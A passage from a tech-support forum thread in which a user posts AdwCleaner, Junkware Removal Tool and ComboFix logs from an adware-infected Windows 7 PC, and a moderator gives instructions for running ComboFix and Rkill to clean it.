Virtual Moon Atlas 3.5c\",\"frecency\":190,\"lastVisitDate\":1453419632826000,\"type\":\"history\",\"baseDomain\":\"virtual-moon-atlas.en.softonic.com\"},{\"url\":\"hxxp://www.pcspeeduppro.net/snic/1/?utm_source=snicwin_ros_us_728&utm_campaign=snicwin_ros_us_728&pxl=SNI162_SNI154_SNI113\",\"title\":\"Get more speed, malware free, registry Clean PC: PC Speedup Pro\",\"frecency\":185,\"lastVisitDate\":1453406315838000,\"type\":\"history\",\"baseDomain\":\"pcspeeduppro.net\"}]"
    [-] Chrome preferences cleaned: "browser.newtabpage.url" - "hxxp://www.bing.com/?pc=COSP&ptag=D091816-A251FF33716&form=CONMHP&conlogo=CT3334491"


    *************************

    :: "Tracing" keys deleted
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C0].txt - [31027 Bytes] - [18/09/2016 21:02:48]
    C:\AdwCleaner\AdwCleaner[S0].txt - [26164 Bytes] - [18/09/2016 20:57:06]
    C:\AdwCleaner\AdwCleaner[S1].txt - [26191 Bytes] - [18/09/2016 20:59:43]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [31249 Bytes] ##########
     
  12. photiost

    photiost Established Techie7 Member

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.0.7 (07.03.2016)
    Operating System: Windows 7 Professional x64
    Ran by Administrator (Administrator) on 18/09/2016 at 21:08:15.34
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 36

    Successfully deleted: C:\Users\Administrator\AppData\Local\crashrpt (Folder)
    Successfully deleted: C:\Users\Administrator\Appdata\LocalLow\company (Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2O851LDV (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40JZT95D (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62AXOPQ5 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6A031VPR (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AD9U8WM6 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CYEMWTVV (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CYEMWTVV (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZG8CKJ5 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KFB13BQ1 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LIXMVQOA (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M30NBFXJ (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\P93G45E1 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLONG5EF (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VBDPD582 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X93KGSF9 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y7CXR8F0 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2O851LDV (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40JZT95D (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62AXOPQ5 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6A031VPR (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AD9U8WM6 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CYEMWTVV (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CYEMWTVV (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FZG8CKJ5 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KFB13BQ1 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LIXMVQOA (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M30NBFXJ (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\P93G45E1 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLONG5EF (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VBDPD582 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X93KGSF9 (Temporary Internet Files Folder)
    Successfully deleted: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y7CXR8F0 (Temporary Internet Files Folder)



    Registry: 3

    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\\win_en_77 (Registry Value)
    Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7B6678FD-F9E3-46FD-aCF0-4C011573F737} (Registry Key)
    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7B6678FD-F9E3-46FD-aCF0-4C011573F737} (Registry Key)




    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 18/09/2016 at 21:09:05.30
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  13. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    Good news :)

    Please download ComboFix from Here, Here or Here to your Desktop.

    **Note: In the event you already have Combofix, this is a new version that I need you to download. It is important that it is saved directly to your desktop**
    • Never rename Combofix unless instructed.
    • Close any open browsers.
    • Very Important! Temporarily disable your anti-virus and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
    • Click on this link to see a list of programs that should be disabled. The list is not all inclusive. If yours is not listed and you don't know how to disable it, please ask.
    • Close any open browsers.
    • WARNING: Combofix will disconnect your machine from the Internet as soon as it starts
    • Please do not attempt to re-connect your machine back to the Internet until Combofix has completely finished.
    • If there is no internet connection after running Combofix, then restart your computer to restore back your connection.
      If the connection is not there use restore point you created prior to running Combofix.
    • Double click on combofix.exe & follow the prompts.

    • NOTE1. If Combofix asks you to install Recovery Console, please allow it.
      NOTE 2. If Combofix asks you to update the program, always do so.
    • When finished, it will produce a report for you.
    • Please post the "C:\ComboFix.txt"
    **Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall
    **Note 2 for AVG and CA Internet Security (Total Defense Internet Security) users: ComboFix will not run until AVG/CA Internet Security is uninstalled as a protective measure against the anti-virus. This is because AVG/CA Internet Security "falsely" detects ComboFix (or its embedded files) as a threat and may remove them resulting in the tool not working correctly which in turn can cause "unpredictable results". Since AVG/CA Internet Security cannot be effectively disabled before running ComboFix, the author recommends you to uninstall AVG/CA Internet Security first.
    Use AppRemover to uninstall it: http://www.appremover.com/
    We can reinstall it when we're done with CF.
    **Note 3: If you receive an error Illegal operation attempted on a registery key that has been marked for deletion, restart computer to fix the issue.
    **Note 4: Some infections may take some significant time to be cured. As long as your computer clock is running Combofix is still working. Be patient.


    Make sure, you re-enable your security programs, when you're done with Combofix.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    NOTE.
    If, for some reason, Combofix refuses to run, try the following...

    Delete Combofix file, download fresh one, but rename combofix.exe to your_name.exe BEFORE saving it to your desktop.
    Do NOT run it yet.
    Download Rkill (courtesy of BleepingComputer.com) to your desktop.
    There are 2 different versions. If one of them won't run then download and try to run the other one.
    You only need to get one of these to run, not all of them. You may get warnings from your antivirus about this tool, ignore them or shutdown your antivirus.

    rKill.exe: http://www.bleepingcomputer.com/download/rkill/dl/10/
    iExplore.exe (renamed rKill.exe): http://www.bleepingcomputer.com/download/rkill/dl/11/

    Restart computer in safe mode

    • Double-click on the Rkill desktop icon to run the tool.
    • If using Windows Vista, 7 or 8 right-click on it and choose Run As Administrator.
    • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
    • If not, delete the file, then download and use the one provided in Link 2.
    • Do not reboot until instructed.
    • If the tool does not run from any of the links provided, please let me know.

    When the scan is done Notepad will open with rKill.txt log.
    NOTE. rKill.txt log will also be present on your desktop.

    Once you've gotten one of them to run, immediately run your_name.exe by double clicking on it.

    IF you had to run rKill post BOTH logs, rKill.txt and Combofix.txt.
     
  14. photiost

    photiost Established Techie7 Member

    ComboFix 16-09-14.01 - Administrator 18/09/2016 22:21:10.2.4 - x64
    Microsoft Windows 7 Professional 6.1.7601.1.1252.2.1033.18.3994.2585 [GMT -4:00]
    Running from: c:\users\Administrator\Desktop\ComboFix.exe
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    * Created a new restore point
    .
    .
    ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    c:\programdata\ntuser.pol
    c:\users\Administrator\AppData\Local\misgua.dll
    c:\users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\YoutubeMusicDownloader.url
    c:\windows\TEMP\ds2918.bin
    .
    Infected copy of c:\windows\SysWow64\dnsapi.dll was found and disinfected
    Restored copy from - c:\windows\winsxs\wow64_microsoft-windows-dns-client_31bf3856ad364e35_6.1.7601.17570_none_4a184beecd8df1f1\dnsapi.dll
    .
    .
    ((((((((((((((((((((((((( Files Created from 2016-08-19 to 2016-09-19 )))))))))))))))))))))))))))))))
    .
    .
    2016-09-19 07:08 . 2016-09-19 07:08 -------- d-----w- c:\users\Administrator\AppData\Local\CrashRpt
    2016-09-19 01:07 . 2016-09-19 01:07 -------- d-----w- c:\users\Administrator\AppData\Roaming\KuaiZip
    2016-09-19 00:56 . 2016-09-19 01:02 -------- d-----w- C:\AdwCleaner
    2016-09-19 00:15 . 2016-09-19 00:58 -------- d-----w- c:\users\Administrator\AppData\Local\CrashDumps
    2016-09-19 00:09 . 2016-09-19 07:08 192216 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
    2016-09-19 00:09 . 2016-09-19 00:09 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
    2016-09-19 00:09 . 2016-09-19 00:09 -------- d-----w- c:\programdata\Malwarebytes
    2016-09-19 00:09 . 2016-03-10 18:09 64896 ----a-w- c:\windows\system32\drivers\mwac.sys
    2016-09-19 00:09 . 2016-03-10 18:08 140672 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
    2016-09-19 00:09 . 2016-03-10 18:08 27008 ----a-w- c:\windows\system32\drivers\mbam.sys
    2016-09-19 00:09 . 2016-09-19 01:00 -------- d-----w- c:\program files (x86)\KuaiZip
    2016-09-18 23:22 . 2016-09-18 23:22 28272 ----a-w- c:\windows\system32\drivers\TrueSight.sys
    2016-09-18 23:21 . 2016-09-18 23:21 -------- d-----w- c:\program files\RogueKiller
    2016-09-18 23:21 . 2016-09-18 23:21 -------- d-----w- c:\programdata\RogueKiller
    2016-09-18 15:57 . 2016-09-18 15:58 -------- d-----w- C:\FRST
    2016-09-18 14:48 . 2016-09-18 14:48 -------- d-----w- c:\program files (x86)\Mozilla Maintenance Service
    2016-09-18 13:09 . 2016-09-18 13:09 -------- d-----w- c:\windows\system32\appmgmt
    2016-09-18 12:49 . 2016-09-18 12:49 -------- d-----w- c:\windows\system32\guu
    2016-09-18 12:05 . 2016-09-18 13:57 -------- d-----w- c:\program files (x86)\LuDaShib
    2016-09-18 12:04 . 2016-09-18 12:50 -------- d-----w- c:\program files\nplusb
    2016-09-18 12:03 . 2016-09-18 12:03 -------- d-----w- c:\users\Administrator\AppData\Local\A
    2016-09-18 12:01 . 2016-09-19 00:37 -------- d-----w- c:\users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 12:01 . 2016-09-18 12:01 -------- d-----w- c:\users\Administrator\AppData\Local\Tempfolder
    2016-09-18 12:01 . 2016-09-18 12:48 -------- d-----w- c:\program files\IcattiUnb
    2016-09-18 12:01 . 2016-09-19 00:37 -------- d-----w- c:\program files (x86)\hostb
    2016-09-18 11:59 . 2016-09-19 00:37 -------- d-----w- c:\program files (x86)\DPowerb
    2016-09-18 11:59 . 2016-09-19 00:37 -------- d-----w- c:\program files\Casterb
    2016-09-18 11:58 . 2016-09-19 00:37 -------- d-----w- c:\program files (x86)\EasyHotspotb
    2016-09-18 11:55 . 2016-09-18 11:56 -------- d-----w- c:\users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 10:33 . 2016-09-18 10:33 -------- d-----w- c:\users\Default\AppData\Local\Microsoft Help
    2016-09-17 01:23 . 2016-09-17 01:25 -------- d-----w- c:\windows\system32\MRT
    2016-09-17 01:12 . 2016-09-18 12:50 -------- d-----w- C:\SUPERDelete
    2016-09-16 14:46 . 2016-09-16 15:05 -------- d-----w- C:\aa Canon 450D Master acum
    2016-09-16 14:41 . 2016-09-16 14:41 -------- d-----w- c:\program files (x86)\Microsoft Visual Studio 8
    2016-09-16 14:41 . 2016-09-16 14:41 -------- d-----w- c:\windows\PCHEALTH
    2016-09-16 14:39 . 2016-09-16 14:39 -------- d-----w- c:\program files\Microsoft Office
    2016-09-16 14:39 . 2016-09-16 14:39 -------- d-----w- c:\users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 14:39 . 2016-09-18 10:36 -------- d-----w- c:\programdata\Microsoft Help
    2016-09-16 14:39 . 2016-09-16 14:39 -------- d-----r- C:\MSOCache
    2016-09-16 14:11 . 2016-08-02 22:36 11847048 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{C4727AA1-FE32-4514-A99B-0C2DE3191D42}\mpengine.dll
    2016-09-14 05:09 . 2016-09-02 15:35 5548264 ----a-w- c:\windows\system32\ntoskrnl.exe
    2016-09-14 01:45 . 2016-09-14 01:48 -------- d-----w- C:\aa Samsung Master accum
    2016-09-13 05:39 . 2016-07-08 15:32 2048 ----a-w- c:\windows\system32\tzres.dll
    2016-09-13 05:39 . 2016-07-08 15:16 2048 ----a-w- c:\windows\SysWow64\tzres.dll
    2016-09-12 23:55 . 2016-06-11 03:34 1597712 ----a-w- c:\program files\Common Files\Microsoft Shared\ClickToRun\ClientTelemetry.dll
    2016-09-12 23:48 . 2016-09-17 11:41 -------- d-----w- C:\aa Canon 600D - T3i Master accum
    2016-09-05 10:40 . 2016-09-05 10:40 28920 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll
    2016-09-05 10:15 . 2016-09-05 10:15 376608 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
    2016-09-05 10:09 . 2016-09-05 10:09 209104 ----a-w- c:\program files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
    .
    .
    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2016-09-05 18:43 . 2016-01-29 22:54 2909888 ----a-w- c:\programdata\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
    2016-09-02 15:16 . 2016-09-14 05:09 44032 ----a-w- c:\windows\apppatch\acwow64.dll
    2016-07-26 18:24 . 2010-11-21 03:27 504488 ------w- c:\windows\system32\MpSigStub.exe
    .
    .
    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive1]
    @="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
    [HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive2]
    @="{5AB7172C-9C11-405C-8DD5-AF20F3606282}"
    [HKEY_CLASSES_ROOT\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive3]
    @="{A78ED123-AB77-406B-9962-2A5D9D2F7F30}"
    [HKEY_CLASSES_ROOT\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive4]
    @="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
    [HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ OneDrive5]
    @="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
    [HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
    2016-01-29 23:03 329376 ----a-w- c:\users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro1 (ErrorConflict)]
    @="{8BA85C75-763B-4103-94EB-9470F12FE0F7}"
    [HKEY_CLASSES_ROOT\CLSID\{8BA85C75-763B-4103-94EB-9470F12FE0F7}]
    2016-09-05 13:09 1658160 ----a-w- c:\program files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro2 (SyncInProgress)]
    @="{CD55129A-B1A1-438E-A425-CEBC7DC684EE}"
    [HKEY_CLASSES_ROOT\CLSID\{CD55129A-B1A1-438E-A425-CEBC7DC684EE}]
    2016-09-05 13:09 1658160 ----a-w- c:\program files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro3 (InSync)]
    @="{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}"
    [HKEY_CLASSES_ROOT\CLSID\{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}]
    2016-09-05 13:09 1658160 ----a-w- c:\program files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL
    .
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SUPERAntiSpyware"="c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe" [2016-09-12 7943072]
    "Chromium"="c:\users\administrator\appdata\local\chromium\application\chrome.exe" [2016-03-18 1068544]
    "Interstatnogui"="c:\users\Administrator\AppData\Roaming\Interstatnogui\interstatnogui.exe" [2016-09-18 4110848]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
    "ConsentPromptBehaviorAdmin"= 5 (0x5)
    "ConsentPromptBehaviorUser"= 3 (0x3)
    "EnableUIADesktopToggle"= 0 (0x0)
    .
    [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
    "LoadAppInit_DLLs"=1 (0x1)
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\!SASCORE]
    @=""
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
    @="Driver"
    .
    R3 d554gps;Dell Wireless HSPA Mini-Card GPS Port;c:\windows\system32\drivers\d554gps64.sys;c:\windows\SYSNATIVE\drivers\d554gps64.sys [x]
    R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
    R3 ecnssndis; Mobile Broadband Driver;c:\windows\System32\Drivers\wwuss64.sys;c:\windows\SYSNATIVE\Drivers\wwuss64.sys [x]
    R3 ecnssndisfltr; Mobile Broadband Driver Filter;c:\windows\System32\Drivers\wwussf64.sys;c:\windows\SYSNATIVE\Drivers\wwussf64.sys [x]
    R3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\drivers\HECIx64.sys;c:\windows\SYSNATIVE\drivers\HECIx64.sys [x]
    R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
    R3 Impcd;Impcd;c:\windows\system32\drivers\Impcd.sys;c:\windows\SYSNATIVE\drivers\Impcd.sys [x]
    R3 Mbm3CBus;Dell Wireless 5530 HSPA Mini-Card Device (WDM);c:\windows\system32\drivers\Mbm3CBus.sys;c:\windows\SYSNATIVE\drivers\Mbm3CBus.sys [x]
    R3 Mbm3DevMt;Dell Wireless HSPA Mini-Card Device Management Driver (WDM);c:\windows\system32\drivers\Mbm3DevMt.sys;c:\windows\SYSNATIVE\drivers\Mbm3DevMt.sys [x]
    R3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\drivers\nusb3hub.sys;c:\windows\SYSNATIVE\drivers\nusb3hub.sys [x]
    R3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\drivers\nusb3xhc.sys;c:\windows\SYSNATIVE\drivers\nusb3xhc.sys [x]
    R3 NvStUSB;NVIDIA Stereoscopic 3D USB driver;c:\windows\system32\drivers\nvstusb.sys;c:\windows\SYSNATIVE\drivers\nvstusb.sys [x]
    R3 nwdelgobi3kfilter;Dell Wireless Gobi 3000 USB Composite Device Filter Driver;c:\windows\system32\drivers\nwdelgobi3kfilter.sys;c:\windows\SYSNATIVE\drivers\nwdelgobi3kfilter.sys [x]
    R3 NWDellPort;Dell Wireless Mobile Broadband Status Port Driver;c:\windows\system32\drivers\nwdelser.sys;c:\windows\SYSNATIVE\drivers\nwdelser.sys [x]
    R3 NWDellPort2;Dell Wireless Mobile Broadband Status2 Port Driver;c:\windows\system32\drivers\nwdelser2.sys;c:\windows\SYSNATIVE\drivers\nwdelser2.sys [x]
    R3 nwdelserial;Dell Wireless Mobile Broadband Serial Driver;c:\windows\system32\drivers\nwdelserial.sys;c:\windows\SYSNATIVE\drivers\nwdelserial.sys [x]
    R3 O2MDFRDR;O2MDFRDR;c:\windows\system32\drivers\O2MDFw7x64.sys;c:\windows\SYSNATIVE\drivers\O2MDFw7x64.sys [x]
    R3 qcfilterdl2k;Dell Wireless 5620 (EV-DO-HSPA) Mobile Broadband Mini-Card Composite Device Filter;c:\windows\system32\drivers\qcfilterdl2k.sys;c:\windows\SYSNATIVE\drivers\qcfilterdl2k.sys [x]
    R3 qcombusdl;Gobi 2000 USB Composite Device Driver(413C-8186);c:\windows\system32\drivers\qcombusdl.sys;c:\windows\SYSNATIVE\drivers\qcombusdl.sys [x]
    R3 qcusbserdl2k;Gobi 2000 USB Device for Legacy Serial Communication(413C-8186);c:\windows\system32\drivers\qcusbserdl2k.sys;c:\windows\SYSNATIVE\drivers\qcusbserdl2k.sys [x]
    R3 rimspci;rimspci;c:\windows\system32\drivers\rimspe64.sys;c:\windows\SYSNATIVE\drivers\rimspe64.sys [x]
    R3 risdpcie;risdpcie;c:\windows\system32\drivers\risdpe64.sys;c:\windows\SYSNATIVE\drivers\risdpe64.sys [x]
    R3 rixdpcie;rixdpcie;c:\windows\system32\drivers\rixdpe64.sys;c:\windows\SYSNATIVE\drivers\rixdpe64.sys [x]
    R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\System32\Drivers\RtsUStor.sys;c:\windows\SYSNATIVE\Drivers\RtsUStor.sys [x]
    R3 stmtpm;stmtpm;c:\windows\system32\drivers\stm_tpm.sys;c:\windows\SYSNATIVE\drivers\stm_tpm.sys [x]
    R3 tcm;tcm;c:\windows\system32\drivers\tcm.sys;c:\windows\SYSNATIVE\drivers\tcm.sys [x]
    R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
    R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
    R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
    S0 stdcfltn;Disk Class Filter Driver for Accelerometer;c:\windows\system32\DRIVERS\stdcfltn.sys;c:\windows\SYSNATIVE\DRIVERS\stdcfltn.sys [x]
    S1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\SASDIFSV64.SYS;c:\program files\SUPERAntiSpyware\SASDIFSV64.SYS [x]
    S1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL64.SYS;c:\program files\SUPERAntiSpyware\SASKUTIL64.SYS [x]
    S2 !SASCORE;SAS Core Service;c:\program files\SUPERAntiSpyware\SASCORE64.EXE;c:\program files\SUPERAntiSpyware\SASCORE64.EXE [x]
    S2 AESTFilters;Andrea ST Filters Service;c:\program files\IDT\WDM\AESTSr64.exe;c:\program files\IDT\WDM\AESTSr64.exe [x]
    S2 ClickToRunSvc;Microsoft Office Click-to-Run Service;c:\program files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe;c:\program files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [x]
    S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
    S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
